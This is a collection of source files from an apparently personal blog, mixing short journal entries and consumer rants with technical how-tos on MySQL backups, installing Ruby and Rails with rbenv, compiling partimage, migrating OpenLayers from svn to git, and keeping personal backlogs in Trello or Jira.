8. Create an html file to hold the animation containing the following:
```
<object>
<param name="movie" value="flower2.swf" />
<param name="loop" value="true" />
<param name="quality" value="high" />
<embed src="flower2.swf" width="399" height="600" />
</object>
```
9. Write a blog article to tell everyone about it ;-)
"history" is a handy command for reviewing your activities for writing up your achievements.
And here it is, providing I've kept up with my hosting fees and not been slashodotted:
<div style="padding: 1em; border: 2px solid black;">
<object>
<param name="movie" value="http://timwise.co.uk/photos/flower2.swf">
<param name="loop" value="true">
<param name="quality" value="high">
<embed src="https://raw.githubusercontent.com/timabell/timwise.co.uk/master/assets/flower2.swf" width="399" height="600">
</object>
</div>
Update, that was an embedded flash file ^ which isn't really a thing on the internet any more.
The original flash file: [flower2.swf](https://raw.githubusercontent.com/timabell/timwise.co.uk/master/assets/flower2.swf)
<file_sep>---
title: "no cycling for me"
date: 2004-09-29
slashdot_url: https://slashdot.org/journal/85317/no-cycling-for-me
---
<p>So this evening I went for a run.<br>And I ran all the way round the outside of Uni campus in 22mins non-stop (kebab fun to kebab van). This shall hence forth be known as the kebab run.<br>Mr K & AB came too, which was nice.</p>
<file_sep>---
title: "Morning"
date: 2004-01-20
slashdot_url: https://slashdot.org/journal/58959/morning
---
<p>Look, I'm up. At 6AM, just to go swimming.</p>
<p>Wierd.</p>
<p>Might as well download Mandrake <a href="http://www.mandrakelinux.com/en/mandrakemove/">Move</a> while I'm at it.</p>
<file_sep>---
layout: post
title: automatic mysql backups
date: '2012-06-14T15:10:00.000Z'
author: <NAME>
categories: [howto, mysql, linux]
modified_time: '2012-06-14T15:12:25.991Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7356368576752162435
blogger_orig_url: https://timwise.blogspot.com/2012/06/automatic-mysql-backups.html
---
On a debian server with mediawiki installed and running with a local mysql.
```
root@myserver:~# apt-get install automysqlbackup
root@myserver:~# crontab -e
# m h dom mon dow command
5 4 * * * automysqlbackup
root@myserver:~# automysqlbackup
root@myserver:~# cd /var/lib/automysqlbackup/
root@myserver:/var/lib/automysqlbackup# find .
.
./weekly
./weekly/wikidb
./weekly/information_schema
./daily
./daily/wikidb
./daily/wikidb/wikidb_2012-06-14_16h03m.Thursday.sql.gz
./daily/information_schema
./daily/information_schema/information_schema_2012-06-14_16h03m.Thursday.sql.gz
./monthly
```
Result! No longer need to write a custom cron script each time.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/7255107648/"><img
src="https://live.staticflickr.com/7226/7255107648_929530d9e0.jpg" alt="Ducklings at henley-on-thames"></a>
</div>
Project homepage:
[http://sourceforge.net/projects/automysqlbackup/](http://sourceforge.net/projects/automysqlbackup/)
<file_sep>---
layout: post
title: New year new blog, happy 2017
date: 2017-01-17 01:00:09.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/01/17/new-year-new-blog-happy-2017/"
---
I've used blogger for years, but the layout for code has not improved for a long time. I've also found my domain's website stagnating because of the hassle of updating it, so I've moved the whole kaboodle to [wordpress.com](https://wordpress.com/).
Find my old blog and all its content at <http://timwise.blogspot.co.uk/>
I'm not migrating the content from blogger because I think google will keep it online, and [cool URIs don't change](https://www.w3.org/Provider/Style/URI.html). I've never been convinced of the value of people lugging their blog posts from one platform to the next, it seems to break more than it fixes most of the time. Like the one where the old host didn't need the trailing slash at the end of the URL and the new host did, breaking half the incoming links. It's only because I'm a web dev that I guessed what the fix was.
Enough about that anyway. Happy new year :-)
Please do add my new blog to your favourite blog reading software / rss reader etc., and do drop me a line on [<EMAIL>](mailto:<EMAIL>) just so I know you're out there!
The original of the header is a photo I took myself which you can find on flickr: [https://www.flickr.com/photos/tim_abell/17111067690/](https://www.flickr.com/photos/tim_abell/17111067690/)
<file_sep>---
title: "swimming"
date: 2004-05-11
slashdot_url: https://slashdot.org/journal/71130/swimming
---
<p>Hello again.</p>
<p>Success of the week (Mon eve):<br>Swimming 400m in (more or less) one attempt.<br>Time taken: 12mins<br>Lengths: 16.</p>
<p>Yay.</p>
<p>Also, for all who didn't know I was the butler (and no, I didn't do it; yawn), I very much enjoyed my stage debut.</p>
<p>I even got recognised in the chinese on sat night by a young lady who had seen the friday night show - joy.</p>
<p>Tim</p>
<file_sep>---
title: "Pay as you drive won't work because..."
date: 2005-06-06
slashdot_url: https://slashdot.org/journal/108638/pay-as-you-drive-wont-work-because
---
<p><a href="http://news.bbc.co.uk/1/hi/uk/4610755.stm">http://news.bbc.co.uk/1/hi/uk/4610755.stm</a></p>
<ul>
<li>People won't fit tracking devices to existing cars - especially if they have to pay for them</li>
<li>Cost of driving is only a dis-incentive if known in advance of the journey.</li>
<li>etc.</li>
<li>rant. grrr.</li>
</ul>
<p>edit: more thoughts</p>
<ul>
<li>if motorways are higher cost, large vehicles will use A & B roads instead, which is bad for cyclists.</li>
<li>why is congestion such a bad thing anyway? isn't it the best incentive for people to seek alternative methods of transport?</li>
<li>why is this any better than the current tax per mile, aka fuel tax? I think perhaps this is a reaction to the revolt against fuel tax rises.</li>
</ul>
<p>If you want to reduce congestion, then apart from sudafed, the best example I've seen is the M25 variable (enforced) speed limit. I'd be more than happy to see this extended to all motorways.</p>
<p>As usual without decent alternatives reducing congestion is a losing battle. Have you taken a regional bus / train service lately? My most recent experience was the Woodley to Reading bus, which took at least half an hour (when it eventually showed up) for a journey I can do in 15 mins on my mountain bike. Add to that no guarantee of a ride home after a few beers and frankly I'd rather drive and put up with ten minutes in traffic.</p>
<p>grrrr.</p>
<p>Maybe I shouldn't listen to the news. Besides, b3ta.com is funnier.</p>
<file_sep>---
title: "Java!=javascript (geek entry)"
date: 2005-06-30
slashdot_url: https://slashdot.org/journal/110732/javajavascript-geek-entry
---
<p><a href="http://www.vsj.co.uk/dotnet/display.asp?id=296">http://www.vsj.co.uk/dotnet/display.asp?id=296</a></p>
<p>Just goes to show you can have a degree <i>and</i> an MCSD and <i>still</i> not know the difference between Java and javascript!</p>
<p>(see section "Whistles and Bells")</p>
<file_sep>---
title: "Vodafone - sucking"
date: 2003-09-16
slashdot_url: https://slashdot.org/journal/46073/vodafone---sucking
---
<p>Sent a message to vodafone saying that I wasn't too impressed.<br>I know ranting gets you nowhere but I feel better nontheless.</p>
<p>The rant:<br>-------------------------------<br>I have been with vodafoam for about 2 months now and I am SERIOUSLY DISSILUSIONED with every aspect of your business.</p>
<p>Since I joined, you have failed to set up my direct debit, twice, blocked my outgoing calls, twice (including calls to 191, you morons!) - for no good reason. Been unable to answer the most basic questions over the phone, such as what has happened to the money I have sent you. And, been alternately "unable" and "too incompetent" to set up normal voicemail notification.</p>
<p>In addition, your website is one of the worst commercial sites I have seen in a long time. I have never seen a site before where your session expires without even being logged on. Appalling. As you may have guessed, I cannot view my bill online as promised because of you inability to set up a direct debit. And the point of that would be what?</p>
<p>I would normally expect at least some kind of apology and some remedial action, however your corporation appears to have its head so far up its own backside that it has no idea what it's like to be one of your customers. I shall look forward to your bland impersonal corporate excuse for a response.<br>--------------------------</p>
<file_sep>---
layout: attachment
title: Sql Data Viewer - Mozilla Firefox_144
date:
type: attachment
parent_id: '534'
published: false
password: ''
status: inherit
categories: []
tags: []
meta: {}
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/13/running-sdv-in-docker/sql-data-viewer-mozilla-firefox_144/"
---
<file_sep>---
title: "new year? when was that?"
date: 2005-03-08
slashdot_url: https://slashdot.org/journal/100287/new-year-when-was-that
---
<p>I wasn't there, I know nothing about it.<br><a href="http://timwise.co.uk/photos/newyear05/">http://timwise.co.uk/photos/newyear05/</a></p>
<file_sep>---
title: "update"
date: 2005-01-18
slashdot_url: https://slashdot.org/journal/95908/update
---
<p>dittons: sold<br>ntl proxy: banned from slashdot - so I shalln't be posting very often.<nobr> </nobr>:(</p>
<p>Everyone should now use Bebo, it's just what the doctor ordered.<br>You can get my new address and my mob number here:<br><a href="http://www.bebo.com/friends/138748a653587b0">http://www.bebo.com/friends/138748a653587b0</a><br>(but only if you give me yours!)</p>
<p>Description: "I am using a service that keeps contact details current, just update your own contact details and then the changes appear in selected friends address books. When I update my contact details you will see them in your address book."</p>
<file_sep>---
title: "a manual? for £££££?!"
date: 2006-07-19
slashdot_url: https://slashdot.org/journal/140082/a-manual-for-
---
<p>What kind of two bit fucked up piece of shit organisation expects you to *BUY* manuals for a product you have already paid for?!</p>
<p>Holy cow, that'd be canon.<br>"Selected User Manuals are available to purchase from Robert Scott..."<br><a href="http://www.canon.co.uk/Support/User_Manuals/index.asp">http://www.canon.co.uk/Support/User_Manuals/index.asp</a></p>
<p>Last fucking business they get from me.</p>
<p>And their support of linux consists of fingers in ears "la la la it doens't exist".</p>
<p>I'm going to try and get a refund for my printer and buy one from a company who cares about their customer's experience.</p>
<p>Wankers.</p>
<file_sep>---
title: "Star gazing"
date: 2004-02-16
slashdot_url: https://slashdot.org/journal/62113/star-gazing
---
<p>I've got a <a href="http://news.bbc.co.uk/1/hi/sci/tech/3490657.stm">galaxy cluster</a> [bbc] in my name!!! Woo yay!</p>
<file_sep>---
title: "<NAME>"
date: 2005-10-21
slashdot_url: https://slashdot.org/journal/120313/hurricane-wilma
---
<p>A live view of the progress of <NAME>:<br><a href="http://earth.google.com/downloads.html">Google Earth</a> plus <a href="http://bbs.keyhole.com/ubb/placemarks/110283-Hurri.kmz">http://bbs.keyhole.com/ubb/placemarks/110283-Hurri.kmz</a></p>
<p>Once you've looked at this, take a look at the spectral overlay (in Places on left hand side)</p>
<file_sep>---
title: "Facial Fuzz"
date: 2004-08-16
slashdot_url: https://slashdot.org/journal/80495/facial-fuzz
---
<p>Forgot to mention earlier the thing I meant to say.</p>
<p>Beardy Tim is no more.</p>
<file_sep>---
title: "let the selling begin"
date: 2004-12-27
slashdot_url: https://slashdot.org/journal/94011/let-the-selling-begin
---
<p>I've made my first <a href="http://cgi.ebay.co.uk/ws/eBayISAPI.dll?ViewItem&item=5740624016&ssPageName=ADME:B:LC:UK:1">ebay entry</a></p>
<p>It's for those gargantuan Dittons that I don't have room for. Let me know if you know anyone who might be interested.</p>
<p>Tim</p>
<file_sep>---
layout: post
title: Installing ruby 2 + Rails 4 on Ubuntu 12.04 LTS
date: '2013-05-13T10:29:00.000Z'
author: <NAME>
tags:
- ruby
modified_time: '2014-10-16T17:36:56.124Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8035590818501389253
blogger_orig_url: https://timwise.blogspot.com/2013/05/installing-ruby-2-rails-4-on-ubuntu.html
---
Installing [Ruby](http://www.ruby-lang.org/) 2 + [Rails](http://rubyonrails.org/) 4 on [Ubuntu](http://www.ubuntu.com/) 12.04 LTS
_Update Dec 2013:_ You may also wish to read [benkwok's blog post on installing ruby and rails](http://benkwok.wordpress.com/2013/08/15/install-rails-on-ubuntu-12-04-lts-with-rbenv/). I've also [posted my notes from installing for an existing project](/2013/12/04/getting-rails-4-up-and-running-with/) which doesn't entirely replace this post but reflects my more recent learnings.
There's a few of these blog posts around, but here's mine for my own benefit (I'm sure this won't be the last time I do it!).
If you have a packaged ruby / rails / rvm / rbenv etc installed, get rid of them all, eg:
$ ruby --versionruby 1.8.7 (2011-06-30 patchlevel 352) [x86_64-linux]$ sudo apt-get remove ruby
Don't use [rvm](https://rvm.io/); and make sure it's been literally purged from your system. It's a pain to remove as it gets into all sorts of places and even _apt-get purge_ doesn't undo changes to the profile etc. If you want to know more about the reason for not using it then read the [rbenv "why" page](https://github.com/sstephenson/rbenv/wiki/Why-rbenv%3F), it's persuasive stuff.
My recommendation from experience so far is to use [rbenv](http://rbenv.org/) to install the latest and greatest RoR (Ruby on Rails). Don't bother with the ubuntu packaged version of rbenv (from apt etc) as you'll be off the beaten track and will have to figure out the ruby-build plugin installation yourself. The local user install is painless and works well. The instructions say to make sure rvm is removed first as it's incompatible.
* Sidenote, [http://rbenv.org/](http://rbenv.org/) is just a one-click link to [https://github.com/sstephenson/rbenv](https://github.com/sstephenson/rbenv)
* Direct link to [rbenv readme](https://github.com/sstephenson/rbenv#readme) (for your convenience)
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8734272311"><img src="https://live.staticflickr.com/7308/8734272311_f49ccb1e42_k.jpg" alt="Minster Church, Boscastle"></a>
</div>
# rbenv installation
Install rbenv into your home directory:
$ git clone git://github.com/sstephenson/rbenv.git ~/.rbenv
Set up the environment as per the (ubuntu specific) [rbenv installation instructions](https://github.com/sstephenson/rbenv#installation):
$ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.profile$ echo 'eval "$(rbenv init -)"' >> ~/.profile
Unless you've done anything before, there is no ~/.profile file before hand, so the contents will then be:
$ cat ~/.profileexport PATH="$HOME/.rbenv/bin:$PATH"eval "$(rbenv init -)"
Restart the login shell:
$ exec $SHELL -l
Check rbenv is now available:
$ rbenvrbenv 0.4.0-45-g060f141Usage: rbenv <command> [<args>]...
Set up the [ruby-build](https://github.com/sstephenson/ruby-build#readme) plugin (as linked in the [rbenv readme](https://github.com/sstephenson/rbenv#readme))
$ git clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
Install the necessary ssl library:
$ sudo apt-get install libssl-dev
If you don't install the openssl development libraries you get this:
BUILD FAILED...The Ruby openssl extension was not compiled. Missing the OpenSSL lib?
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8734303977"><img
src="https://live.staticflickr.com/7310/8734303977_566f96b159_k.jpg" alt="Looking out of a cave on the beach"></a>
</div>
# Ruby installation
Install the latest ruby (version name obtained from [release info on ruby blog](http://www.ruby-lang.org/en/news/2013/02/24/ruby-2-0-0-p0-is-released/)), takes 5-10 mins
$ rbenv install 2.0.0-p0
Now select the installed ruby as the default for your user (ref: [https://github.com/sstephenson/rbenv#choosing-the-ruby-version](https://github.com/sstephenson/rbenv#choosing-the-ruby-version))
$ rbenv global 2.0.0-p0 tim@atom:~$ ruby --versionruby 2.0.0p0 (2013-02-24 revision 39474) [x86_64-linux]
# Rails installation
Now as per the [Rails 4 RC1 announcement](http://weblog.rubyonrails.org/2013/5/1/Rails-4-0-release-candidate-1/) install the release candidate of Rails 4 (this was the latest at time of writing). Takes 5-10 mins.
$ gem install rails --version 4.0.0.rc1 --no-ri --no-rdoc
Tell rbenv to create the new shims and see the installed rails:
$ rbenv rehash$ rails --versionRails 4.0.0.rc1
* * *
All done! That wasn't so hard, it was all the blind alleys that took the time.
Now use [bundler](http://gembundler.com/) as recommended in the rbenv readme to set up an app etc.
Thanks for listening :-)
# Footnote
It pains me somewhat to have to use installations outside of the Ubuntu package manager, however it seems there are some grumblings about the packaged versions of the above software. Add into this that I wish to use the latest RoR on an LTS release of Ubuntu which seeing as the Rails community don't seem to provide debs / repos etc leaves a packaged version out of the question for now. I've learned previously the hard way the destructive effect of randomly installing everything you find outside the package management system of a distro so have tread carefully when creating the above information.
# See also
* [http://benkwok.wordpress.com/2013/08/15/install-rails-on-ubuntu-12-04-lts-with-rbenv/](http://benkwok.wordpress.com/2013/08/15/install-rails-on-ubuntu-12-04-lts-with-rbenv/)
* <https://github.com/asdf-vm/asdf> / <https://asdf-vm.com/> - a version manager for node/ruby/python/etc...
* <https://rvm.io/> - Ruby Version Manager
* Docker - properly isolate all your things - <https://en.wikipedia.org/wiki/Docker_%28software%29>
<file_sep>---
title: "Blollogs"
date: 2004-06-14
slashdot_url: https://slashdot.org/journal/74343/blollogs
---
<p>Sloth gets a <a href="http://dwiseman.blogspot.com/">blog</a></p>
<file_sep>---
title: "light"
date: 2003-11-17
slashdot_url: https://slashdot.org/journal/52384/light
---
Yay for daily <a href="http://www.dilbert.com/comics/dilbert/archive/">dilbert</a>
<file_sep>---
layout: post
title: Git for TFS users
date: 2017-10-27 20:44:06.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '10803929611'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/10/27/git-for-tfs-users/"
---
I'm considering creating a 30 minute video to help teams transition from Team Foundation Server source control to git (hosted with TFS or Visual Studio Team Services - aka VSTS).
Please [register your interest](http://eepurl.com/c9imrH). If I get enough interest in this then I'll do the work to put it together and launch it.

<file_sep>---
layout: post
title: compiling partimage
date: '2007-03-26T23:06:00.000Z'
author: <NAME>
tags:
- partimage
- dev
- project
modified_time: '2007-03-26T23:32:22.663Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5549746669475271810
blogger_orig_url: https://timwise.blogspot.com/2007/03/compiling-partimage.html
---
Had a problems getting partimage to compile on one of my pcs from a fresh checkout.
svn co https://partimage.svn.sourceforge.net/svnroot/partimage/trunk/partimage partimage
The ./autogen.sh script was failing as follows
tim@lap:~/projects/partimage$ ./autogen.sh
Running "autoreconf -vif" ...
autoreconf: Entering directory .'
autoreconf: running: autopoint --force
autoreconf: running: aclocal -I m4 --output=aclocal.m4t
autoreconf: aclocal.m4' is unchanged
autoreconf: configure.ac: tracing
autoreconf: running: libtoolize --copy --force
autoreconf: running: /usr/bin/autoconf --force
autoreconf: running: /usr/bin/autoheader --force
autoreconf: running: automake --add-missing --copy
configure.ac: 16: required file ./[config.h].in' not found
Makefile.am:1: AM_GNU_GETTEXT in configure.ac' but intl' not in SUBDIRS
automake: Makefile.am: AM_GNU_GETTEXT in configure.ac' but ALL_LINGUAS' not defined
autoreconf: automake failed with exit status: 1
Done.
Barked up lots of wrong trees, including looking for missing libraries, gettext config etc.
Turned out to be an old version of automake.
Not sure how my other pc ended up with the right version, but this pc's version was:
$ automake --version
automake (GNU automake) 1.4-p6
Installing new version (with some help from command line auto-completion):
$ apt-get install automake_[tab]_
automake automake1.5 automake1.8
automake1.4 automake1.6 automake1.9
automake1.4-doc automake1.7 automaken
$ sudo apt-get install automake1.9
...
$ automake --version
automake (GNU automake) 1.9.6
After updating automake, the ./autogen.sh script ran, and I could then run ./configure and make successfully, and was left with a binary for partimage in src/client/
Hurrah.
The solution came from a post by <NAME> on cdsware.cern.ch:
> [Re: problem with autoreconf when installing from cvs](http://cdsware.cern.ch/lists/project-cdsware-users/archive/msg00694.shtml)
>
> * From: <NAME><tibor.simko@xxxxxxx>
> * Subject: Re: problem with autoreconf when installing from cvs
> * Date: Thu, 18 Jan 2007 18:12:20 +0100
>
> Hello:
>
> On Thu, 18 Jan 2007, <NAME> wrote:
>
> > $ autoreconf
> > Makefile.am:23: AM_GNU_GETTEXT in configure.ac' but intl' not in SUBDIRS
> > automake: Makefile.am: AM_GNU_GETTEXT in configure.ac' but
> > ALL_LINGUAS' not defined
>
> Which version numbers of automake, autoconf, and gettext do you have?
> E.g. automake versions prior to 1.9 and gettext versions prior to 0.14
> will not work.
>
> Best regards
> --
> <NAME></<EMAIL>@xxxxxxx>
<file_sep>---
title: "motorola"
date: 2003-11-17
slashdot_url: https://slashdot.org/journal/52399/motorola
---
<p>apparently their mailservers are down. have been for a week.</p>
<p>Hoorah for leading edge technical firms.</p>
<p>Talked to the next guy in their call farm, he got arsey and said that they couldn't really support their product on a different manufacturer's phone.</p>
<p>Tossers.</p>
<file_sep>---
layout: post
title: openlayers svn into git
date: '2010-02-04T14:01:00.014Z'
author: <NAME>
tags:
- git
- openlayers
- svn
modified_time: '2011-05-18T22:12:01.236Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1272986229621647717
blogger_orig_url: https://timwise.blogspot.com/2010/02/openlayers-svn-into-git.html
---
Initial clone:
git svn clone -T trunk/openlayers/ -t tags/openlayers/ -b branches/openlayers/ http://svn.openlayers.org/ openlayers.git
"http://svn.openlayers.org/tags/openlayers/docs-2.8/" is in the wrong place and gets pulled in by the git clone.
I should have used `--no-follow-parent` to avoid the _docs-2.8_ tag pulling in docs history but not going to re-clone now. If you are repeating this, try this instead:
git svn clone --no-follow-parent -T trunk/openlayers/ -t tags/openlayers/ -b branches/openlayers/ http://svn.openlayers.org/ openlayers.git
Find the errant docs branches & eliminate:
cd openlayers.gitfor x in `git for-each-ref --format="%(refname)" 'refs/remotes/tags/docs*'`; do git update-ref -d $x; done
[http://dound.com/2009/04/git-forever-remove-files-or-folders-from-history/](http://dound.com/2009/04/git-forever-remove-files-or-folders-from-history/)
expunge old objects (I think this works)
git reflog expire --allgit gc --aggressive --prune
Then run: [http://www.shatow.net/fix-svn-refs.sh](http://www.shatow.net/fix-svn-refs.sh) to create real git tags.
If you just want the result you can download a copy complete with svn metadata from [http://www.timwise.co.uk/openlayers-dev/openlayers.git.tgz](http://www.timwise.co.uk/openlayers-dev/openlayers.git.tgz)
You will then be able to run
git svn fetch
to get updates from the openlayers svn server.
There is a published copy at [http://github.com/timabell/openlayers](http://github.com/timabell/openlayers), though it doesn't have the svn metadata.
* * *
I also tackled the docs folder:
The docs directory has no matching branch or tag directories, so the following is sufficient:
git svn clone -T trunk/doc http://svn.openlayers.org/ openlayers-doc.gitgit gc --aggressive --prune
You can download this from [http://www.timwise.co.uk/openlayers-dev/openlayers-doc.git.tgz](http://www.timwise.co.uk/openlayers-dev/openlayers-doc.git.tgz)
* * *
Anything else I come up with will end up at [http://www.timwise.co.uk/openlayers-dev/](http://www.timwise.co.uk/openlayers-dev/)
<file_sep>---
title: "Anargams"
date: 2003-12-12
slashdot_url: https://slashdot.org/journal/54879/anargams
---
<p>Anagrams of <NAME> (yes, that's me.)<br>Can't remember where I got it. some link off b3ta I expect.</p>
<p>Hot Me<NAME><br>I'm the tall boy<br>AH BE TIT MOLLY<br>AH IBM TO TELLY<br>TOBY A H MILLET<br>THAI BE MY TOLL<br>HALLO IM BETTY<br>MY HALO BE TILT<br>BYE TO ILL MATH<br>LET MY HAT BOIL<br>BET I'M THY LOLA<br>THY LOLA BIT ME!<br>TOTALLY BE HIM<br>ME HIT TALL BOY<br>LAY THE TO LIMB<br>AM BILL THE TOY</p>
<file_sep>---
title: "firefox bookmark synch extension"
date: 2005-06-23
slashdot_url: https://slashdot.org/journal/110184/firefox-bookmark-synch-extension
---
<p>after an earlier post saying the synchroniser was broken on firefox 1.0.4 (which it was!) it appears to have mysteriously started working again.<br>I'm not aware of having perfoermed any updates.</p>
<p>wierd.</p>
<p>so in short;<br>the bookmarks on timwise.co.uk will be up to date once more.</p>
<file_sep>---
title: "Play / 14th Oct"
date: 2004-09-28
slashdot_url: https://slashdot.org/journal/85200/play--14th-oct
---
<p><a href="http://twyrusdrama.org.uk/Oct04.htm">http://twyrusdrama.org.uk/Oct04.htm</a></p>
<p>Hello one and all,</p>
<p>My drama group is putting on a production of Clerical Errors in two weeks time. The script looks to be very amusing and I'm looking forward to going. Let me know if you want to come with me.</p>
<p>I plan to go on the first night and to involve a meal hopefully at La Fontana. Tickets are £6. I will be putting in the order for tickets this friday so try to let me know by then if you're going to make it.</p>
<p>It's a hot ticket! Don't miss out<nobr> </nobr>;)</p>
<p>If you can't make Thursday let me know and I'll put together numbers for the other two nights and may go again.</p>
<p>Yours</p>
<p>Tim</p>
<p>mail me on<br>tim@<a href="http://www.timwise.co.uk/">timwise.co.uk</a></p>
<p>
---------------</p>
<p>If you didn't get this as an email it either means I don't know who you are (hello! mail me<nobr> </nobr>:) or I got your address wrong or never had it, in which case mail me!</p>
<p>Another couple of thoughts on contact details etc:<br>Do you have a website? If so let me know and if you don't mind I'll post a link to it.<br>Secondly,<nobr> </nobr>/. has a system for tracking relationships which is quite cool, so can I suggest we all get<nobr> </nobr>/. accounts and set each other as friends (or foes, mwaa ha ha.) then we won't ever have to keep that big list of email addresses. Do it now!<br><a href="http://slashdot.org/login.pl?op=newuserform">http://slashdot.org/login.pl?op=newuserform</a></p>
<file_sep>---
title: "ebay - buy my stuff"
date: 2005-03-07
slashdot_url: https://slashdot.org/journal/100196/ebay---buy-my-stuff
---
<p>I am currently selling my prized posessions on eBay.</p>
<ul> <li>cd player</li>
<li>barbells (not mine)</li>
<li>scanner</li>
<li>washing machine!</li>
</ul>
<p><a href="http://search.ebay.co.uk/_W0QQfgtpZ1QQfrppZ25QQsassZtimQ5fabell">tim_abell's items on eBay</a><br>No-one's bid yet so it's bargain basement prices!</p>
<file_sep>---
layout: page
title: Send me a voice message
permalink: /message/
---
<iframe src="https://www.speakpipe.com/widget/inline/xk0i1rwxa0eiva276zef9bkgom7bra48" allow="microphone" width="100%" height="200" frameborder="0"></iframe>
<script async src="https://www.speakpipe.com/widget/loader.js" charset="utf-8"></script>
<https://www.speakpipe.com/ssbf>
<file_sep>---
title: "I hate ebay because..."
date: 2005-06-12
slashdot_url: https://slashdot.org/journal/109161/i-hate-ebay-because
---
<ul> <li>their website is soooo slow.</li>
<li>You can't change a listing in the last 24hrs, but there's nothing to say so</li>
<li>You can't see anything before 60 days ago</li>
<li>You can't change your invoices if you make a mistake</li>
<li>they really stress me out every time i try to use their stupid website.</li>
<li>the whole thing is really counter intuitive</li>
<li>there is no competition, so they can be as shit as they want and people will still use it.</li>
</ul>
<p>/ unashamed rant</p>
<p>Ps I've had a shitty cold for the last few days.<br>Yes, I'm currently a bad mood bear. Did I mention I hate sundays too? Why does everything shut by the time I'm up? (4pm) If they've even bothered opening at all.</p>
<p>Someone find me a beer.</p>
<p>edit:<br>ok, having read this<br><a href="http://forums.ebay.com/db2/thread.jspa?threadID=2231811&tstart=0&mod=1114654773979">http://forums.ebay.com/db2/thread.jspa?threadID=2231811&tstart=0&mod=1114654773979</a><br>I'm never using ebay again. [expletive deleted].</p>
<p>by the way, the reason i'm so pissed is that they've charged me for two listings which I NEVER GOT PAYMENT FOR. [expletive deleted]</p>
<file_sep>---
layout: post
title: Don't trust audible.com, it's drm infected and they don't tell you
date: '2008-07-23T22:28:00.006Z'
author: <NAME>
tags:
- rant
- opinion
- review
- drm
modified_time: '2008-07-24T18:21:38.453Z'
thumbnail: http://farm4.static.flickr.com/3141/2697164218_1fc49eed23_t.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3207018266105951792
blogger_orig_url: https://timwise.blogspot.com/2008/07/dont-trust-audiblecom-its-drm-infected.html
---
If there's one thing I hate (there isn't, there's lots, but this is today's)
it's companies being economical with the truth to get you to part with your
money, only to have you disappointed when you find out the whole truth.
I just bought an audio book on audible.co.uk. And now I can't even listen to
it. I thought I was buying an mp3, or maybe even an ogg file. It is only on
actually attempting to download the thing I have just paid for that I discover
to my utter disgust that _all_ the download links are for some kind of evil drm
type program (I presume here, but there sure as hell was no mp3 in sight).

As you can see from the screenshot above, they clearly imply an mp3 download. I
haven't seen such a clear use of weasel sales words for some time.
Next time I'll read the god damn small print, but I still think this is totally
out of order not warning that they are providing crippled versions of what you
think you are buying.
Thank fsm for people like the FSF. Their logo really sums up how I feel about
being treated in this way.
[](http://www.defectivebydesign.org/)
## Update: credit where due. 24th July 2008
My complaint about the website still stands, and my aversion to
drm has not diminished, however the responses I have received from their
customer service (by email), have been prompt, courteous and have totally
resolved my outstanding problem. I have been given a full refund. I've been
especially impressed given the hot blooded content of my initial contact. A lot
of companies could learn lessons in good customer relations from these people.
## Update: the battle is lost (for now). 12 Aug 2019
I use audible (now an amazon company) on my not-very-freedom-loving android
phone these days. I haven't tried using audbile on a linux desktop lately,
times have changed and everything is android/iphone first now. I still consider
DRM to be a nasty form of lockin.
<file_sep>---
title: name_here
layout: post
---
content
<file_sep>---
layout: post
title: Personal backlogs
---
## What's wrong with our current backlog / icebucket / todo list?
Do you have a backlog of doom? A bottomless bucket full of probably unimportant things you possibly should do, interspersed with the occasional really import thing that will bite you hard if you don't do it? Do you spend time repeatedly refining the list to make sure you don't miss the important things? Or do you just ignore it and hope luck will save you from the things you let slip?
I've known for a long time that [basecamp promote having no backlog at all](https://basecamp.com/shapeup/2.1-chapter-07#no-backlogs), based on the idea that it takes too much time and anything important will come up again anyway. To some extent I agree, but I have also found serious issues in systems that are perhaps less visible to the naked eye which will for sure have a consequence if not addressed (maybe something that is quietly corrupting data or failing to store it, or maybe a security issue).
## So what should we do instead?
The answer came to me when I read [basecamp's new Shape Up book (summarized here)](/2019/11/26/time-to-shape-up-your-scrum-process-the-new-thing-from-basecamp/) that describes their unique way of working. They don't have a shared backlog, instead they leave it to each person in the organisation to use whatever method they choose to remember what *they* think is important, and then bring that to the table for consideration at the scheduled times that new work is considered.
The full shape-up process is a bit too much of a jump for the teams I usually work on, however I shared the above with a team I worked with, and they took it and came up with an excellent best-of-both-worlds solution. And it's so good I think everyone should use it.
This solution...
* perfectly balances the elimination of a backlog-of-doom nightmare,
* addresses the need to not lose important ideas as team members change,
* and adds the ability to collaborate.
* is ridiculously simple
### Trello
Set it up as follows: Set up a new trello board, name it "shared backlog" or similar, create a list (column) for every team member with their name (and optionally role) as the list title.

Now when anyone thinks of anything that the team should possibly do, they add a card **to their own list** on the shared backlog trello board. It is now clear who owns the idea and is responsible for campaigning to get it prioritized.
In preparation for the next planning session each person organises their own list so that the things they think are most important are on the top.
On a regular basis, (say fortnightly during a sprint planning session or similar), the team goes through the board, and each person talks about their top one or two cards to say why they think it should be included in the sprint. The cards that are chosen by the team get added to the sprint to be done as part of the normal work for the team, thus making sure they actually happen.
Simple eh?
Here's an example board <https://trello.com/b/cxRXPgcb/personal-backlogs-example>, you can use it as a template if you wish.
### Jira
If you're using Jira you can achieve the same effect by abusing the "sprint" feature. Just create some extra sprints with the "Create spring" button and instead of calling them "sprint 25" etc, call them "Tech backlog", "Design Backlog", "Customer Service Backlog" etc. Then you can nicely group each role's needs and they can manage their own priorities within their own backlog. The actual "backlog" in Jira can now be just for true user stories / product features.

### Useful?
